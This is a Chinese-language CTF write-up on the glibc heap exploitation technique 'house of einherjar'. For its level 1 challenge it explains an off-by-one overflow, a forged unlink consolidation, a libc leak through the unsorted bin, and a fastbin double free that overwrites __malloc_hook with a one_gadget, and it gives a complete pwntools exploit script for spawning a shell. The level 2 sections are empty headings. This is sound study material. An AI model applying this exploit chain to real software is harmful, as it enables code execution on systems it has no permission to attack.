现在我们就可以开始伪造堆块，这样就可以进行house of einherjar的利用。结合利用原理，这时我们先要申请一个堆块ID0大小为0x10，这样我们就可以进行对高地址的的堆块进行溢出。然后我们要申请一个size位为0x100整数倍的堆块。所以我们申请一个堆块ID1大小为0xf8的堆块，然后我们再申请一个堆块ID2大小为0x10，用于另一个堆块的溢出。之后我们继续申请一个堆块ID3大小为0xf8的堆块。最后由于edit的堆块的size是调用上一个ID堆块的size，所以我们还要申请一个堆块ID4大小为0x40（这样我们在编辑堆块ID2的时候就可以进行溢出操作）。这时我们就要溢出修改ID3的prev_size和prev_inuse这两个位

然后我们还要再申请一个堆块ID5大小为0x40，这样我们才能在修改ID0的时候发生溢出，从而修改ID1堆块的size位、fd、bk这三个

之后我们就可以释放堆块ID3这样我们就可以将该堆块释放，并且触发unlink进行后向合并，并且可以绕过unlink的检查机制，这样我们ID1、ID2、ID3就可以合并（其实是ID1和ID3合并）因为我们修改了size和prev_size。所以合并的时候就会连同ID2的堆块一起合并，放入unsorted_bin中。但是堆块ID2的地址还是保存在chunk[ID]数组中我们还可以对这个堆块进行show、edit操作，这时我们再申请一个堆块ID1大小为0xf8。
这时就会从unsorted_bin合并的堆块中分割0xf8大小。这时剩下的堆块，其fd、bk指针就恰好为堆块ID2中的fd、bk、由于unsorted_bin使用的是双向链表，此时的fd、bk指针就会被指向main_arena+88地址处，这时我们就可以show(ID2)从而泄露libc地址

level_1_分析3

接下来我们就可以利用ID2这个堆块进行UAF漏洞，这样我们就可以通过堆风水构造double free，劫持malloc_hook和realloc_hook
我们可以通过这些来计算偏移

1
2
3

libc_addr = main_area - 88 - 0x10 - libc.sym['__malloc_hook']
malloc_hook = libc_addr+libc.sym['__malloc_hook']
realloc_hook = libc_addr+libc.sym["realloc"]

接下来我们就构造double，这时我们需要去__malloc_hook找可以伪造的堆块。我们需要这样的堆块，使得我们double free从而之后申请到这个地址的堆块，从而可以修改__malloc_hook、realloc_hook的地址，从而劫持hook指针为onegadget这样去getshell。（虽然这个地址的size并不是0x70、0x71，但是在double free的时候这个堆块也会被放入fastbin链表中）

接下来我们构造double free，我们现在就利用一个ID2去构造UAF，由于我们要劫持hook所要申请到的地址size位为0x7f，这样我们就要将其放入0x70的fastbin中。
所以我们先申请一个堆块ID10，大小为0x68，这样申请的堆块size才会为0x70。此时chunk[10]存储的堆地址与chunk[2]存储的堆地址是相同的。此时我们释放chunk[10]这个堆块，这样该堆块的就会被放入fastbin链表，该堆块的fd指针就会被启用，这时我们就使用edit()对chunk[2]修改，从而修改fd指针，使其指向 malloc_hook - 0x23

之后我们就先申请一个先申请一个ID11大小为0x68，然后我们再申请一个堆块ID13这样我们就可以将malloc_hook-0x23的这个堆块地址申请回来，然后我们可以修改malloc_hook为realloc+16、改realloc_hook为ogg+6。
此时我们的ogg为如下，这里我们ogg+6的原因是，当我们直接hook到ogg的时候rcx不是一个正常地址，会导致段错误，所以我就ogg+6直接不执行某个汇编代码，这样就不会出现段错误

之后我们再创建一个堆块，触发调用malloc，这样就可以触发malloc_hook,从而getshell

level_1_exp

exp如下：

import os
import sys
from pwn import *
context.terminal = ["tmux", "neww"]
p = process('./pwn')
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
context.log_level='debug'
def create(ID,size):
    p.sendline(b'1')
    p.sendline(str(ID).encode('utf-8'))
    p.sendline(str(size).encode('utf-8'))

def show(ID):
    p.sendline(b'2')
    p.sendline(str(ID).encode('utf-8'))

def dele(ID):
    p.sendline(b'3')
    p.sendline(str(ID).encode('utf-8'))

def edit(ID,content):
    p.sendline(b'4')
    p.sendline(str(ID).encode('utf-8'))
    p.sendline(content)

create(6,0x10)
create(7,0x20)
create(8,0x20)
create(9,0x40)
#gdb.attach(p)
dele(8)
dele(7)
payload = b'a'*0x1f
edit(6,payload)
show(6)
p.recvuntil(b'to show?Content:')
p.recvline()
chunk_addr = p.recvline()[:-1]
print('chunk_addr----->',chunk_addr)
chunk_addr = int.from_bytes(chunk_addr,'little')
chunk_addr = chunk_addr - 0x50
create(0,0x10)
create(1,0xf8)
create(2,0x10)
create(3,0xf8)
create(4,0x40)
# 溢出修改ID3
chunk1_addr = chunk_addr + 0x20+0x30+0x30+0x50+0x20
chunk3_addr = chunk_addr + 0x20+0x30+0x30+0x50+0x20+0x120
payload = b'a'*0x10+p64(0x120)+p64(0x100)#+p64(chunk1_addr)+p64(chunk1_addr)
edit(2,payload)
# 溢出修改ID1
create(5,0x40)
payload = b'a'*0x10+p64(0)+p64(0x121)+p64(chunk1_addr)+p64(chunk1_addr)
edit(0,payload)

dele(3)
create(1,0xf8)
show(2)
p.recvuntil(b'to show?Content: ')
main_area = p.recvline()[:-1]
main_area = int.from_bytes(main_area,'little')
print('main_area--->',hex(main_area))
libc_addr = main_area - 88 - 0x10 - libc.sym['__malloc_hook']
malloc_hook = libc_addr+libc.sym['__malloc_hook']
realloc_hook = libc_addr+libc.sym["realloc"]
fake_chunk = malloc_hook - 0x23
ogg = [0x45216,0x4526a,0xf02a4,0xf1147]
ogg = libc_addr + ogg[1]+6
#gdb.attach(p)
#pause()
create(10,0x68)
dele(10)
edit(2,p64(fake_chunk))
create(11,0x68)
#create(12,0xf0)
create(13,0x68)
edit(13,b'a'*3+p64(0)+p64(ogg)+p64(realloc_hook+16))
#gdb.attach(p)
create(14,20)
#gdb.attach(p)
p.interactive()

house of einherjar_level_2

level_2_分析1

level_2_分析2

level_2_分析3

level_2_exp

总结

对于house of einherjar的这种堆利用方式，相同点就是触发堆块的unlink的向后合并，可以有以下几种思路：
- 第一种就是像实验那样，在栈上伪造堆块，并且存在堆溢出，这样在堆合并后再次申请堆块就会申请到栈上，这样我们就可能可以修改栈上的返回地址，从而劫持程序的执行流。
- 第二种就是在堆块上的利用现有的堆通过堆溢出中off-by-one造成堆叠，然后通过堆风水和堆排布得到double free等漏洞，之后就可以申请任意地址，这样可能可以劫持hook、got表等地址。（例题：level1）